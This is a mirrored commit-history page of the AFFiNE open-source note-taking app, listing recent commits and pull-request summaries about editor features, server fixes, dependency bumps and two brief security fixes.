mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-02-04 08:38:34 +00:00
50507fc9bfc0a9be3198df65bb6126387776ceef
10962 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
DarkSky
|
46e7d9fab7 |
chore: bump electron (#13935)
fix #13647 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Release Notes * **Chores** * Updated development tooling and build dependencies to latest stable versions * Increased minimum Node.js requirement to version 22 * Updated macOS deployment target to version 11.6 * Enhanced type safety and error handling in build processes <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Xun Sun
|
17ec76540b |
feat(editor): import docs from docx (#11774)
Support importing .docx files, as mentioned in https://github.com/toeverything/AFFiNE/issues/10154#issuecomment-2655744757 It essentially uses mammoth to convert the docx to html, and then imports the html with the standard steps. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Import Microsoft Word (.docx) files directly via the import dialog (creates new documents). * .docx added as a selectable file type in the file picker and import options. * **Localization** * Added localized labels and tooltips for DOCX import in English, Simplified Chinese, and Traditional Chinese. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
DarkSky
|
e5db0e66c1 | chore: update schema | ||
|
Kevin
|
525b65c6ca |
fix(server): config typo (#13913)
Fix a typo on the SMTP configuration page |
||
|
DarkSky
|
c302425a05 | fix(server): doc squash timeout (#13939) | ||
|
DarkSky
|
abe73e9996 |
fix: config escape error (#13936)
fix #13702 |
||
|
Richard Lora
|
e379da200e |
feat(editor): add collapse/expand toggle for groups with caching (#12671)
https://github.com/user-attachments/assets/4ef71704-57bb-45b8-9e73-8a51c67fb158 Adds a collapsible toggle for group-by groups. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **New Features** - Collapsible groups for desktop and mobile table views with persistent per-view collapsed state and a keyboard-accessible toggle button. - **Bug Fixes** - Group title icons now render consistently across variants. - **Tests** - Added unit tests verifying collapse/expand behavior for group components. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: 3720 <zuozijian1994@gmail.com> Co-authored-by: L-Sun <zover.v@gmail.com> |
||
|
3720
|
6ec1948f62 |
feat(editor): release callout (#13896)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Callout is no longer gated as an experimental option — it now consistently appears in the editor’s slash menu and toolbar where applicable. * **Tests** * End-to-end slash-menu tests updated to expect the Callout item in search results and adjusted item ordering. * **Chores** * Repository ignore rules updated to exclude .kiro files. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.4 |
||
|
DarkSky
|
7e6ead4232 | feat: native doc reader (#13881) | ||
|
Hongxu Xu
|
02dcfdcc40 |
chore(native): remove unused deps (#13854)
Identified some unused dependencies and refactored them. |
||
|
Vitaly Barakov
|
5a2f508dac |
feat(editor): hidden 'add icon' label on print if icon is not set (#13868)
This caption (see screenshot) is added when you try to print doc, even if there is no icon. <img width="1269" height="897" alt="изображение" src="https://github.com/user-attachments/assets/d63383e6-48a2-44fb-8f32-ae91d1e9e8c6" /> |
||
|
Martin Pauli
|
2bd9f1a353 |
feat: implement tray and minimize behaviors (#13851)
This PR introduces new window behaviors, which can be enabled when the menubar setting is active: New Features: - Quick open from tray icon - Minimize to tray - Exit to tray - Start minimized These changes have not yet been tested on macOS. <img width="645" height="479" alt="image" src="https://github.com/user-attachments/assets/7bdd13d0-5322-45a4-8e71-85c081aa0c86" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable menubar/tray behaviors: open on left-click, minimize to tray, close to tray (exit to tray), and start minimized. * **UI** * Appearance settings add a Menubar → Window Behavior group with four toggles; group shows only when menubar/tray is enabled (hidden on macOS). * **Settings** * Tray settings persisted and exposed via the settings API with getters and setters for each option. * **Localization** * Added translation keys and English strings for the new controls and descriptions. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: Peng Xiao <pengxiao@outlook.com> |
||
|
Vitaly Barakov
|
9f6ea83ac1 |
fix(editor): linked doc popover close when layout is switched (#13867)
Fixing the disappearing linked doc menu called by @ when switching language using Alt+Shift. |
||
|
DarkSky
|
d33df659f8 | feat: check server type in chat (#13875) | ||
|
Peng Xiao
|
c9a4129a3e | fix: a security issue related to open external (#13864) | ||
|
DarkSky
|
dd676611ce | test: fix mock api v0.25.3-beta.0 v0.25.3 | ||
|
Lakr
|
f3bb2be5ef | feat: request apply subscription mutation (#13844) | ||
|
DarkSky
|
8535b3dc41 | feat(server): refresh subscription if event is from anonymous account (#13840) | ||
|
DarkSky
|
89cc9b072b |
feat(server): early subscription for iap (#13826)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a mutation to request/apply a subscription by transaction ID (client mutation and server operation), returning subscription details. * **Bug Fixes / Improvements** * More robust external subscription sync with safer conflict detection, optional short-lived confirmation, improved parsing and error logging. * **Chores** * Standardized time constants for clarity. * **Tests** * Updated subscription test data (expiration date) to reflect new lifecycle expectations. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
e4b5b24fdd | chore: bump package version | ||
|
DarkSky
|
9904f50e0b |
feat(server): improve crypto (#13822)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Resolved cryptographic compatibility issues with OpenSSL 3.x. * **New Features** * Broader support for multiple key types for signing and verification. * OTP generation adjusted (affects digit distribution/values). * **Refactor** * Internal cryptographic key handling reworked for improved stability, compatibility, and multi-key-type support. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video. * **Dependencies** * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.). * **Bug Fixes** * Tightened authentication state validation for magic-link/OTP flows. * Stricter space-join validation to reject invalid client types/versions. * Improved transcript entry deduplication and data handling. * **API** * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Kandula Ramesh Kumar
|
d74087fdc5 |
fix(blocksuite): stabilize cross-document clipboard snapshot handling (#13817)
This PR addresses issue Fixes: #13805 (cross-document copy/paste not working). Locally verified that: - Copy → paste between two documents now works consistently. - Clipboard snapshot payload remains intact when encoded/decoded. - External paste (e.g., to Notepad or browser text field) functions correctly. E2E tests for clipboard behavior were added, but Playwright browsers could not be installed in the container (`HTTP 403` from CDN). Manual verification confirms the fix works as intended. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Tests** * Added cross-document clipboard regression tests for copy/paste between documents, external clipboard validation, and multi-block copy; duplicate test entries noted. * **Chores** * Minor formatting and whitespace cleanup around clipboard handling. * Improved error handling in paste flows. * Standardized HTML formatting for clipboard payload attributes. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
875565d08a |
fix(server): avoid a snowball effect of email sending failures (#13818)
fix #13802 |
||
|
DarkSky
|
0ecd915245 | docs: update readme | ||
|
OrbisAI Sec
|
b5ebd20314 |
fix(core): prevent container privilege escalation in .devcontainer/docker-compose.yml (#13814)
**Context and Purpose:** This PR automatically remediates a security vulnerability: - **Description:** Service 'app' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this. - **Rule ID:** yaml.docker-compose.security.no-new-privileges.no-new-privileges - **Severity:** HIGH - **File:** .devcontainer/docker-compose.yml - **Lines Affected:** 4 - 4 This change is necessary to protect the application from potential security risks associated with this vulnerability. **Solution Implemented:** The automated remediation process has applied the necessary changes to the affected code in `.devcontainer/docker-compose.yml` to resolve the identified issue. Please review the changes to ensure they are correct and integrate as expected. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Enhanced security configuration for the development environment. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
c102e2454f |
feat(server): fetch missing field from rcat (#13794)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Performance** * Added caching mechanism for subscription product data to reduce API calls and improve response times. * **Improvements** * Enhanced asynchronous processing of subscription entitlements for more reliable product data retrieval from the payment provider. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
5fc3258a3d |
feat(server): expose mail server name config in admin dashboard (#13792)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added SMTP name configuration field to notification settings. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.207.0`]( |
||
|
dependabot[bot]
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
Martijn Smit
|
a0613b6306 |
feat(core): enhance Notion import with folder hierarchy and page icons (#13692)
Hi 👋 Love what you're doing with AFFiNE, I found my Notion replacement in this app. Coming from Notion and importing my workspaces, I saw the need to improve the import functionality to replicate the folder hierarchy from Notion into the AFFiNE folder structure in the `Organize` section. There are a few issues(i.e. #12961 and #13629 ) of people that expected the same behavior. This should make it a lot easier for people to move over. ### Technical description Improve Notion import functionality to preserve organizational structure and page icons from exports: - Add folder hierarchy preservation during Notion import - Extract and set page icons (emoji and image) from Notion HTML - Integrate with OrganizeService to recreate folder structure - Use ExplorerIconService to apply page icons to imported documents - Tested using production workspace exports from Notion, several thousand pages and multiple hierarchy levels deep. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Imports from Notion/HTML now recreate folder hierarchies and link imported pages into that structure. - Page icons (emoji and supported images) are extracted and attached to imported pages. - Import results now include the created root folder for quick access. - Improvements - Import flows integrate folder creation and icon assignment with non-blocking error handling. - Bug Fixes - Avoids including undefined page IDs in successful imports. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <darksky2048@gmail.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
renovate[bot]
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>getsentry/sentry-electron (@​sentry/electron)</summary> ### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0) - feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0) - feat: Log os and device attributes ([#​1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246)) ### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1) - fix: Preload injection path ([#​1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243)) - fix: Preload `contextIsolation` issues ([#​1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244)) - fix: Include `sentry.origin` with auto-generated logs ([#​1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241)) ### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0) - feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) ([#​1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236)) - feat: Optional Namespaced IPC ([#​1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234)) - fix: Export `ErrorEvent` type ([#​1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229)) - fix: Only capture logs if `enableLogs` is true ([#​1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235)) ### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0) This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the the [migration guide](./MIGRATION.md) for more details. - feat: Update JavaScript SDKs to v10.8.0 ([#​1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205)) ### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0) - feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to [v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0) - fix: Ensure native directory ends up in package ([#​1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216)) ### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0) - feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) - fix: Don't use `deepmerge` to merge events to remove circular ref. issues ([#​1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210)) - fix: Support `node16` for TypeScript `moduleResolution` ([#​1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203)) ### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0) - feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) - feat: Add `eventLoopBlockIntegration` ([#​1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188)) - feat: Move renderer event loop block detection to an integration ([#​1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196)) ### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0) - feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) - fix: Don't capture stack traces from destroyed renderers ([#​1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165)) ### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0) - feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) - feat: Add structured logging support ([#​1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
congzhou09
|
e2de0e0e3d |
fix(editor): add trash state for linked-doc and synced-doc appearance (#13767)
This PR updates the appearance of `embed-linked-doc-block` and `embed-synced-doc-block` to reflect the trashed state of their linked documents. Previously, these blocks showed no visual difference whether the linked document was trashed or not, despite the existing of codes for deletion-related appearance. This change ensures that the deletion appearance is properly displayed.  <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Documents now support trash state tracking for improved deletion management * **Bug Fixes** * Improved synchronization and refresh of embedded documents when document states change * Enhanced handling of trashed documents in embedded content <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Juan Abimael Santos Castillo
|
6fb0ff9177 |
chore(native): simplify Array::get method with functional approach (#13771)
## Issue The Array::get method used verbose nested Option handling with redundant returns, making the code longer and less Rust idiomatic. ## Solution Replaced the nested if let structure with a functional and_then approach that: - Eliminates redundant return keyword usage - Flattens Option handling for cleaner logic - Reduces code from 13 lines to 9 lines - Maintains identical functionality ## Result More idiomatic Rust code that's easier to read and maintain, with all tests passing. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Improved internal code structure with functional programming patterns for enhanced maintainability. No visible changes to end-user functionality. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
Cats Juice
|
c2fb6adfd8 |
feat(mobile): add discord link in setting (#13789)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a new Discord community link in the mobile settings Others section with an animated "Hot" badge * **Localization** * Added multilingual support for the new Discord link across all supported languages <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Lakr
|
8aeb8bd0ca |
feat(ios): insert app user id to rc (#13756)
This pull request integrates RevenueCat into the iOS paywall system, enabling user authentication and subscription management through the RevenueCat SDK. It introduces new dependencies, updates the paywall plugin initialization, and adds logic to fetch and use the current user identifier from the web context for RevenueCat login. The most important changes are grouped below: **RevenueCat Integration and Configuration:** * Added `purchases-ios-spm` (RevenueCat) as a Swift Package dependency in `AffinePaywall` and updated `Package.resolved` to track the new dependency. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Package.swift`, `packages/frontend/apps/ios/App/App.xcworkspace/xcshareddata/swiftpm/Package.resolved`) [[1]](diffhunk://#diff-7716c691e65a220dad542e024fbf91547c45ea69ddff1d0b6a002a497cd7c8ecR20-R28) [[2]](diffhunk://#diff-63609de9bdfc08b8a0691a4f0ddb7ddff07ae76b40ec2ee7c12adb7db226eb3cR48-R56) * Implemented `Paywall.setup()` for initializing RevenueCat configuration, including setting log level, proxy URL, and a static API key. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Paywall.swift`, `packages/frontend/apps/ios/App/Plugins/PayWall/PayWallPlugin.swift`) [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR8-R30) [[2]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edR14) **User Authentication and Subscription State:** * Enhanced the paywall ViewModel logic to fetch the current user identifier from the web context (`window.getCurrentUserIdentifier`), configure RevenueCat, and log in the user before fetching subscription state. Improved error handling and ensured external entitlement fetching is robust. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Model/ViewModel+Action.swift`) [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR9) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL120-R155) [[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR165) * Added a global JavaScript function `getCurrentUserIdentifier` to the iOS web context to retrieve the current user's account ID for use in RevenueCat login. (`packages/frontend/apps/ios/src/app.tsx`) **Project Metadata:** * Downgraded the `objectVersion` in the Xcode project file, possibly to maintain compatibility with other tools or environments. (`packages/frontend/apps/ios/App/App.xcodeproj/project.pbxproj`) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## 